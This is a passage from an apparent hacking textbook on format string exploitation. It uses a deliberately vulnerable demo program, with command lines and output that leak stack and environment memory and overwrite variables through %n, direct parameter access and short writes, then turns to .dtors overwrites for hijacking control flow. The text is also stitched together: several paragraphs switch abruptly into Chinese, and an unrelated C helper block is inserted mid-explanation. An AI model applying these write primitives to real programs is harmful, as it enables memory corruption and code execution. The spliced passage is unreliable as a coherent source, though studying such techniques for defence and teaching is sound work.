The wrong way to print user-controlled input:
testingbffff3e0
[*] test_val @ 0x08049794 = -72 0xffffffb8 
reader@hacking:~/booksrc $

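When the %x format parameter was used, the hexadecimal representation of a four-byte word in the stack was printed. This process can be used repeatedly to examine stack memory.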

reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "%08x."x40')
The right way to print user-controlled input:
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
.%08x.
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
.%08x.
%08x.%08x.
The wrong way to print user-controlled input:
bffff320.b7fe75fc.00000000.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e
.30252
e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e
.30252e78.2
52e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78
.252e78
38.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.
[*] test_val @ 0x08049794 = -72 0xffffffb8 
reader@hacking:~/booksrc $

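So this is what the lower stack memory looks like. Remember that each four-byte word is backward, due to the little-endian architecture. The bytes 0x25, 0x30, 0x38, 0x78, and 0x2e seem to be repeating a lot. Wonder what those bytes are?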

reader@hacking:~/booksrc $ printf "\x25\x30\x38\x78\x2e\n"
%08x. 
reader@hacking:~/booksrc $

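As you can see, they're the memory for the format string itself. Because the format function will always be on the highest stack frame, as long as the format string has been stored anywhere on the stack, it will be located below the current frame pointer (at a higher memory address). This fact can be used to control arguments to the format function. It is particularly useful if format parameters that pass by reference are used, such as %s or %n.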

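Reading from Arbitrary Memory Addresses

The %s format parameter can be used to read from arbitrary memory addresses. Since it's possible to read the data of the original format string, part of the original format string can be used to supply an address to the %s format parameter, as shown here: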

reader@hacking:~/booksrc $ ./fmt_vuln AAAA%08x.%08x.%08x.%08x
The right way to print user-controlled input:
AAAA%08x.%08x.%08x.%08x
The wrong way to print user-controlled input:
AAAAbffff3d0.b7fe75fc.00000000.41414141
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $

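The four bytes of 0x41 indicate that the fourth format parameter is reading from the beginning of the format string to get its data. If the fourth format parameter is %s instead of %x, the format function will attempt to print the string located at 0x41414141. This will cause the program to crash with a segmentation fault, since this isn't a valid address. But if a valid memory address is used, this process can be used to read a string found at that memory address.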

reader@hacking:~/booksrc $ env | grep PATH
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
reader@hacking:~/booksrc $ ./getenvaddr PATH ./fmt_vuln
PATH will be at 0xbffffdd7
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x.%08x.%08x.%s
The right way to print user-controlled input:
????%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
????bffff3d0.b7fe75fc.00000000./usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:
/bin:/
usr/games
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $

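Here the getenvaddr program is used to get the address for the environment variable PATH. Since the program name fmt_vuln is two bytes shorter than getenvaddr, four is added to the address, and the bytes are reversed due to the byte ordering. The fourth format parameter of %s reads from the beginning of the format string, thinking it's the address that was passed as a function argument. Since this address is the address of the PATH environment variable, it is printed as if a pointer to the environment variable were passed to printf().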

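Now that the distance between the end of the stack frame and the beginning of the format string memory is known, the field-width arguments can be omitted in the %x format parameters. These format parameters are only needed to step through memory. Using this technique, any memory address can be examined as a string.

Writing to Arbitrary Memory Addresses

If the %s format parameter can be used to read an arbitrary memory address, you should be able to use the same technique with %n to write to an arbitrary memory address. Now things are getting interesting.

The test_val variable has been printing its address and value in the debug statement of the vulnerable fmt_vuln.c program, just begging to be overwritten. The test variable is located at 0x08049794, so by using a similar technique, you should be able to write to the variable.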

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x.%08x.%08x.%s
The right way to print user-controlled input:
????%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
????bffff3d0.b7fe75fc.00000000./usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:
/bin:/
usr/games
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
The right way to print user-controlled input:
??%08x.%08x.%08x.%n
The wrong way to print user-controlled input:
??bffff3d0.b7fe75fc.00000000.
[*] test_val @ 0x08049794 = 31 0x0000001f 
reader@hacking:~/booksrc $

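As this shows, the test_val variable can indeed be overwritten using the %n format parameter. The resulting value in the test variable depends on the number of bytes written before the %n. This can be controlled to a greater degree by manipulating the field width option.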

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%n
The right way to print user-controlled input:
??%x%x%x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = 21 0x00000015
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%100x%n
The right way to print user-controlled input:
??%x%x%100x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 120 0x00000078
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%180x%n
The right way to print user-controlled input:
??%x%x%180x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 200 0x000000c8
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%400x%n
The right way to print user-controlled input:
??%x%x%400x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 420 0x000001a4 
reader@hacking:~/booksrc $

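By manipulating the field-width option of one of the format parameters before the %n, a certain number of blank spaces can be inserted, resulting in the output having some blank lines. These lines, in turn, can be used to control the number of bytes written before the %n format parameter. This approach will work for small numbers, but it won't work for larger ones, like memory addresses.

Looking at the hexadecimal representation of the test_val value, it's apparent that the least significant byte can be controlled fairly well. (Remember that the least significant byte is actually located in the first byte of the four-byte word of memory.) This detail can be used to write an entire address. If four writes are done at sequential memory addresses, the least significant byte can be written to each byte of a four-byte word, as shown here: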

Memory                        94 95 96 97
First write to 0x08049794     AA 00 00 00
Second write to 0x08049795       BB 00 00 00
Third write to 0x08049796           CC 00 00 00
Fourth write to 0x08049797             DD 00 00 00
Result                        AA BB CC DD

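As an example, let's try to write the address 0xDDCCBBAA into the test variable. In memory, the first byte of the test variable should be 0xAA, then 0xBB, then 0xCC, and finally 0xDD. Four separate writes to the memory addresses 0x08049794, 0x08049795, 0x08049796, and 0x08049797 should accomplish this. The first write will write the value 0x000000aa, the second 0x000000bb, the third 0x000000cc, and finally 0x000000dd.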

The first write should be easy.

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??%x%x%8x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc       0
[*] test_val @ 0x08049794 = 28 0x0000001c
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xaa - 28 + 8
$1 = 150
(gdb) quit
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%150x%n
The right way to print user-controlled input:
??%x%x%150x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 170 0x000000aa 
reader@hacking:~/booksrc $

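The last %x format parameter uses 8 as the field width to standardize the output. This is essentially reading a random DWORD from the stack, which could output anywhere from 1 to 8 characters. Since the first overwrite puts 28 into test_val, using 150 as the field width instead of 8 should set the least significant byte of test_val to 0xAA.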

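Now for the next write. Another argument is needed for another %x format parameter to increment the byte count to 187, which is 0xBB in decimal. This argument could be anything; it just has to be four bytes long and must be located after the first arbitrary memory address of 0x08049794. Since this is all still in the memory of the format string, it can be easily controlled. The word JUNK is four bytes long and will work fine.

After that, the next memory address to be written to, 0x08049795, should be put into memory so the second %n format parameter can access it. This means the beginning of the format string should consist of the target memory address, four bytes of junk, and then the target memory address plus one. But all of these bytes of memory are also printed by the format function, thus incrementing the byte counter used for the %n format parameter. This is getting tricky.

Perhaps we should think about the beginning of the format string ahead of time. The goal is to have four writes. Each one needs a memory address passed to it, and between them, four bytes of junk are needed to properly increment the byte counter for the %n format parameters. The first %x format parameter can use the four bytes found before the format string itself, but the remaining three will need to be supplied with data. For the entire write procedure, the beginning of the format string should look like this:

Figure 0x300-4.

Let's give it a try.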

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\
x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%8x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc       0
[*] test_val @ 0x08049794 = 52 0x00000034
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xaa - 52 + 8"
$1 = 126
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\
x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc
0
[*] test_val @ 0x08049794 = 170 0x000000aa 
reader@hacking:~/booksrc $

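The addresses and junk data at the beginning of the format string changed the value of the necessary field width option for the %x format parameter. However, this is easily recalculated using the same method as before. Another way this could have been done is to subtract 24 from the previous field width value of 150, since six new four-byte words have been added to the front of the format string.

Now that all the memory is set up ahead of time in the beginning of the format string, the second write should be simple.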

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbb - 0xaa"
$1 = 17
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\
x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
   0         4b4e554a
[*] test_val @ 0x08049794 = 48042 0x0000bbaa 
reader@hacking:~/booksrc $

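The next desired value for the least significant byte is 0xBB. A hexadecimal calculator quickly shows that 17 more bytes need to be written before the next %n format parameter. Since memory has already been set up for a %x format parameter, it's simple to write 17 bytes using the field width option.

This process can be repeated for the third and fourth writes.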

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcc - 0xbb"
$1 = 17
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xdd - 0xcc"
$1 = 17
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\
x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n%17x%n%17x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n%17x%n%17x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
   0         4b4e554a         4b4e554a         4b4e554a
[*] test_val @ 0x08049794 = -573785174 0xddccbbaa 
reader@hacking:~/booksrc $

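By controlling the least significant byte and performing four writes, an entire address can be written to any memory address. It should be noted that the three bytes found after the target address will also be overwritten using this technique. This can be quickly explored by statically declaring another initialized variable called next_val, right after test_val, and also displaying this value in the debug output. The changes can be made in an editor or with some more sed magic.

Here, next_val is initialized with the value 0x11111111, so the effect of the write operations on it will be apparent.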

reader@hacking:~/booksrc $ sed -e 's/72;/72, next_val = 0x11111111;/;/@/{h;s/test/next/
g;x;G}'
fmt_vuln.c > fmt_vuln2.c
reader@hacking:~/booksrc $ diff fmt_vuln.c fmt_vuln2.c
7c7
<    static int test_val = -72;
---
> static int test_val = -72, next_val = 0x11111111;
27a28
> printf("[*] next_val @ 0x%08x = %d 0x%08x\n", &next_val, next_val, next_val);
reader@hacking:~/booksrc $ gcc -o fmt_vuln2 fmt_vuln2.c 
reader@hacking:~/booksrc $ ./fmt_vuln2 test
The right way:
test
The wrong way:
test
[*] test_val @ 0x080497b4 = -72 0xffffffb8
[*] next_val @ 0x080497b8 = 286331153 0x11111111
reader@hacking:~/booksrc $

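As the preceding output shows, the code change has also moved the address of the test_val variable. However, next_val is shown to be adjacent to it. For practice, let's write an address into the variable test_val again, using the new address.

Last time, a very convenient address of 0xddccbbaa was used. Since each byte is greater than the previous byte, it's easy to increment the byte counter for each byte. But what if an address like 0x0806abcd is used? With this address, the first byte of 0xCD is easy to write using the %n format parameter by outputting 205 bytes total with a field width of 161. But the next byte to be written is 0xAB, which would need 171 bytes to be output. It's easy to increment the byte counter for the %n format parameter, but it's impossible to subtract from it.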

reader@hacking:~/booksrc $ ./fmt_vuln2 AAAA%x%x%x%x
The right way to print user-controlled input:
AAAA%x%x%x%x
The wrong way to print user-controlled input:
AAAAbffff3d0b7fe75fc041414141
[*] test_val @ 0x080497f4 = -72 0xffffffb8
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 5"
$1 = 200
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\
xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%8x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc       0
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $ 
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\
xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%8x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc       0
[*] test_val @ 0x080497f4 = 52 0x00000034
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 52 + 8"
$1 = 161
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\
xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
                                       0
[*] test_val @ 0x080497f4 = 205 0x000000cd
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xab - 0xcd"
$1 = -34 
reader@hacking:~/booksrc $

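Instead of trying to subtract 34 from 205, the least significant byte is simply wrapped around to 0x1AB by adding 222 to 205 to produce 427, which is the decimal representation of 0x1AB. This technique can be used to wrap around again and set the least significant byte to 0x06 for the third write.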

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x1ab - 0xcd"
$1 = 222
reader@hacking:~/booksrc $ gdb -q --batch -ex "p /d 0x1ab"
$1 = 427
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\
xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
                                       0
                                                      4b4e554a
[*] test_val @ 0x080497f4 = 109517 0x0001abcd
[*] next_val @ 0x080497f8 = 286331136 0x11111100
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x06 - 0xab"
$1 = -165
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x106 - 0xab"
$1 = 91
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\
xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
                                       0
                                                    4b4e554a
                           4b4e554a
[*] test_val @ 0x080497f4 = 33991629 0x0206abcd
[*] next_val @ 0x080497f8 = 286326784 0x11110000
reader@hacking:~/booksrc $

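With each write, bytes of the next_val variable, adjacent to test_val, are being overwritten. The wraparound technique seems to be working fine, but a slight problem manifests itself as the final byte is attempted.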

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x08 - 0x06"
$1 = 2
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\
xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%2x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%2x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3a0b7fe75fc
                                  0
                                                      4b4e554a
                           4b4e554a4b4e554a
[*] test_val @ 0x080497f4 = 235318221 0x0e06abcd
[*] next_val @ 0x080497f8 = 285212674 0x11000002 
reader@hacking:~/booksrc $

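What happened here? The difference between 0x06 and 0x08 is only two, but eight bytes are output, resulting in the byte 0x0e being written by the %n format parameter. This is because the field width option for the %x format parameter is only a minimum field width, and eight bytes of data were output. This problem can be alleviated by simply wrapping around again; however, it's good to know the limitations of the field width option.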

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x108 - 0x06"
$1 = 258
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\
xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%258x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%258x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3a0b7fe75fc
                                  0
                                                      4b4e554a
                           4b4e554a
                                                                  4b4e554a
[*] test_val @ 0x080497f4 = 134654925 0x0806abcd
[*] next_val @ 0x080497f8 = 285212675 0x11000003
reader@hacking:~/booksrc $

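Just like before, the appropriate addresses and junk data are put in the beginning of the format string, and the least significant byte is controlled for four write operations to overwrite all four bytes of the variable test_val. Any value subtractions to the least significant byte can be accomplished by wrapping the byte around. Also, any additions less than eight may need to be wrapped around in a similar fashion.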

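Direct Parameter Access

Direct parameter access is a way to simplify format string exploits. In the previous exploits, each of the format parameter arguments had to be stepped through sequentially. This necessitated using several %x format parameters to step through parameter arguments until the beginning of the format string was reached. In addition, the sequential nature required three 4-byte words of junk to properly write a full address to an arbitrary memory location.

As the name implies, direct parameter access allows parameters to be accessed directly by using the dollar sign qualifier. For example, %n$d would access the nth parameter and display it as a decimal number.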

printf("7th: %7$d, 4th: %4$05d \n", 10, 20, 30, 40, 50, 60, 70, 80);

The preceding printf() call would have the following output:

7th: 70, 4th: 00040

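First, the 70 is output as a decimal number when the format parameter of %7$d is encountered, because the seventh parameter is 70. The second format parameter accesses the fourth parameter and uses a field width option of 05. All of the other parameter arguments are untouched. This method of direct access eliminates the need to step through memory until the beginning of the format string is located, since this memory can be accessed directly. The following output shows the use of direct parameter access.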

reader@hacking:~/booksrc $ ./fmt_vuln AAAA%x%x%x%x
The right way to print user-controlled input:
AAAA%x%x%x%x
The wrong way to print user-controlled input:
AAAAbffff3d0b7fe75fc041414141
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $ ./fmt_vuln AAAA%4\$x
The right way to print user-controlled input:
AAAA%4$x
The wrong way to print user-controlled input:
AAAA41414141
[*] test_val @ 0x08049794 = -72 0xffffffb8 
reader@hacking:~/booksrc $

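In this example, the beginning of the format string is located at the fourth parameter argument. Instead of stepping through the first three parameter arguments using %x format parameters, this memory can be accessed directly. Since this is being done on the command line and the dollar sign is a special character, it must be escaped with a backslash. This just tells the command shell to avoid trying to interpret the dollar sign as a special character. The actual format string can be seen when it is printed correctly.

Direct parameter access also simplifies the writing of memory addresses. Since memory can be accessed directly, there's no need for four-byte spacers of junk data to increment the byte output count. Each of the %x format parameters that usually performs this function can just directly access a piece of memory found before the format string. For practice, let's use direct parameter access to write a more realistic-looking address of 0xbffffd72 into the variable test_val.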

reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\
x08"
. "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%4\$n
The right way to print user-controlled input:
????????%4$n
The wrong way to print user-controlled input:
????????
[*] test_val @ 0x08049794 = 16 0x00000010
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0x72 - 16
$1 = 98
(gdb) p 0xfd - 0x72
$2 = 139
(gdb) p 0xff - 0xfd
$3 = 2
(gdb) p 0x1ff - 0xfd
$4 = 258
(gdb) p 0xbf - 0xff
$5 = -64
(gdb) p 0x1bf - 0xff
$6 = 192
(gdb) quit
reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\
x08"
. "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%98x%4\$n%139x%5\$n
The right way to print user-controlled input:
????????%98x%4$n%139x%5$n
The wrong way to print user-controlled input:
????????
                                                                 bffff3c0
                                                 b7fe75fc
[*] test_val @ 0x08049794 = 64882 0x0000fd72
reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\
x08"
. "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%98x%4\$n%139x%5\$n%258x%6\$n%192x%7\$n
The right way to print user-controlled input:
????????%98x%4$n%139x%5$n%258x%6$n%192x%7$n
The wrong way to print user-controlled input:
???????? 
                                                                bffff3b0
                                                 b7fe75fc
                            0
                                   8049794
[*] test_val @ 0x08049794 = -1073742478 0xbffffd72
reader@hacking:~/booksrc $

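Since the stack doesn't need to be printed to reach our addresses, the number of bytes written at the first format parameter is 16. Direct parameter access is only used for the %n parameters, since it really doesn't matter what values are used for the %x spacers. This method simplifies the process of writing an address and shrinks the mandatory size of the format string.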

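Using Short Writes

Another technique that can simplify format string exploits is using short writes. A short is typically a two-byte word, and format parameters have a special way of dealing with them. A more complete description of possible format parameters can be found on the printf manual page. The portion describing the length modifier is shown in the output below.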

	The length modifier
	    Here, integer conversion stands for d, i, o, u, x, or X conversion.

	    h      A following integer conversion corresponds to a short int or
	           unsigned short int argument, or a following n conversion
	           corresponds to a pointer to a short int argument.

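This can be used with format string exploits to write two-byte shorts. In the output below, a short is written in at both ends of the four-byte test_val variable. Naturally, direct parameter access can still be used.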

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%hn
The right way to print user-controlled input:
??%x%x%x%hn
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = -65515 0xffff0015
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08")%x%x%x%hn
The right way to print user-controlled input:
??%x%x%x%hn
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = 1441720 0x0015ffb8
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08")%4\$hn
The right way to print user-controlled input:
??%4$hn
The wrong way to print user-controlled input:
??
[*] test_val @ 0x08049794 = 327608 0x0004ffb8 
reader@hacking:~/booksrc $

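Using short writes, an entire four-byte value can be overwritten with just two %hn parameters. In the example below, the test_val variable will be overwritten once again with the address 0xbffffd72.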

reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xfd72 - 8
$1 = 64874
(gdb) p 0xbfff - 0xfd72
$2 = -15731
(gdb) p 0x1bfff - 0xfd72
$3 = 49805
(gdb) quit
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08\x96\x97\x04\x08")
%64874x%4\
$hn%49805x%5\$hn
The right way to print user-controlled input:
????%64874x%4$hn%49805x%5$hn
The wrong way to print user-controlled input:
b7fe75fc
[*] test_val @ 0x08049794 = -1073742478 0xbffffd72 
reader@hacking:~/booksrc $

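The preceding example used a similar wraparound method to deal with the second write of 0xbfff being less than the first write of 0xfd72. Using short writes, the order of the writes doesn't matter, so the smaller value 0xbfff can be written first and 0xfd72 second, if the two passed addresses are swapped in position. In the output below, the address 0x08049796 is written to first, and 0x08049794 is written to second.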

(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xfd72 - 0xbfff
$2 = 15731
(gdb) quit
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08\x94\x97\x04\x08")
%49143x%4\
$hn%15731x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%15731x%5$hn
The wrong way to print user-controlled input:
????

                                                       b7fe75fc
[*] test_val @ 0x08049794 = -1073742478 0xbffffd72
reader@hacking:~/booksrc $

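The ability to overwrite arbitrary memory addresses implies the ability to control the execution flow of the program. One option is to overwrite the return address in the most recent stack frame, as was done with the stack-based overflows. While this is a possible option, there are other targets that have more predictable memory addresses. The nature of stack-based overflows only allows the overwrite of the return address, but format strings provide the ability to overwrite any memory address, which creates other possibilities.

Detours with .dtors

In binary programs compiled with the GNU C compiler, special table sections called .dtors and .ctors are made for destructors and constructors, respectively. Constructor functions are executed before the main() function is executed, and destructor functions are executed just before the main() function exits with an exit system call. The destructor functions and the .dtors table section are of particular interest.

A function can be declared as a destructor function by defining the destructor attribute, as seen in dtors_sample.c.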

dtors_sample.c

#include <stdio.h>
#include <stdlib.h>

static void cleanup(void) __attribute__ ((destructor));

int main() {
   printf("Some actions happen in the main() function..\n");
   printf("and then when main() exits, the destructor is called..\n");

   exit(0);
}

void cleanup(void) {
   printf("In the cleanup function now..\n"); 
}

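In the preceding code sample, the cleanup() function is defined with the destructor attribute, so the function is automatically called when the main() function exits, as shown next.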

reader@hacking:~/booksrc $ gcc -o dtors_sample dtors_sample.c
reader@hacking:~/booksrc $ ./dtors_sample
Some actions happen in the main() function..
and then when main() exits, the destructor is called..
In the cleanup function now..
reader@hacking:~/booksrc $

这种在退出时自动执行函数的行为是由二进制的 .dtors 表部分控制的。这个部分是一个以 NULL 地址结尾的 32 位地址数组。数组始终以 0xffffffff 开头，以 0x00000000 的 NULL 地址结束。在这两者之间是所有已声明具有析构属性的函数的地址。
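The table layout described above (a 0xffffffff head marker, zero or more function addresses, then a NULL terminator) can be modeled on an ordinary array. The following is an illustrative sketch only; count_dtor_entries() is a hypothetical name, and it inspects a copy of the table contents rather than the live section of a running binary.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: counts the destructor addresses stored between the
 * 0xffffffff head marker and the NULL terminator of a .dtors-style table.
 * Returns -1 if the marker or the terminator is missing. */
int count_dtor_entries(const uint32_t *table, size_t max_words) {
   size_t i;
   assert(table != NULL);
   if (max_words == 0 || table[0] != 0xffffffffu)
      return -1;                 /* table must start with the marker */
   for (i = 1; i < max_words; i++) {
      if (table[i] == 0)         /* NULL address ends the table */
         return (int)(i - 1);
   }
   return -1;                    /* ran off the end without a terminator */
}
```

A table holding one destructor address yields 1, while a table that is just the marker followed by NULL yields 0.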

可以使用 nm 命令找到 cleanup() 函数的地址，并使用 objdump 检查二进制的部分。

reader@hacking:~/booksrc $ nm ./dtors_sample
080495bc d _DYNAMIC
08049688 d _GLOBAL_OFFSET_TABLE_
080484e4 R _IO_stdin_used
         w _Jv_RegisterClasses
080495a8 d __CTOR_END__
080495a4 d __CTOR_LIST__ 
080495b4 d __DTOR_END__
080495ac d __DTOR_LIST__
080485a0 r __FRAME_END__
080495b8 d __JCR_END__
080495b8 d __JCR_LIST__
080496b0 A __bss_start
080496a4 D __data_start
08048480 t __do_global_ctors_aux
08048340 t __do_global_dtors_aux
080496a8 D __dso_handle
         w __gmon_start__
08048479 T __i686.get_pc_thunk.bx
080495a4 d __init_array_end
080495a4 d __init_array_start
08048400 T __libc_csu_fini
08048410 T __libc_csu_init
         U __libc_start_main@@GLIBC_2.0
080496b0 A _edata
080496b4 A _end
080484b0 T _fini
080484e0 R _fp_hw
0804827c T _init
080482f0 T _start
08048314 t call_gmon_start
`080483e8 t cleanup`
080496b0 b completed.1
080496a4 W data_start
         U exit@@GLIBC_2.0
08048380 t frame_dummy
080483b4 T main
080496ac d p.0
         U printf@@GLIBC_2.0 
reader@hacking:~/booksrc $

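The nm command shows that the cleanup() function is located at 0x080483e8 (highlighted in the listing above). It also reveals that the .dtors section starts at 0x080495ac with __DTOR_LIST__ and ends at 0x080495b4 with __DTOR_END__. This means that 0x080495ac should contain 0xffffffff, 0x080495b4 should contain 0x00000000, and the address between them (0x080495b0) should contain the address of the cleanup() function (0x080483e8).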

objdump 命令显示了 .dtors 部分的实际内容（如下所示加粗），尽管格式略令人困惑。80495ac 的第一个值只是显示了 .dtors 部分所在的位置地址。然后显示了实际的字节，而不是 DWORD，这意味着字节是反向的。考虑到这一点，一切看起来都是正确的。

reader@hacking:~/booksrc $ objdump -s -j .dtors ./dtors_sample

./dtors_sample:     file format elf32-i386

Contents of section .dtors:
 80495ac `ffffffff e8830408 00000000`           ............
reader@hacking:~/booksrc $
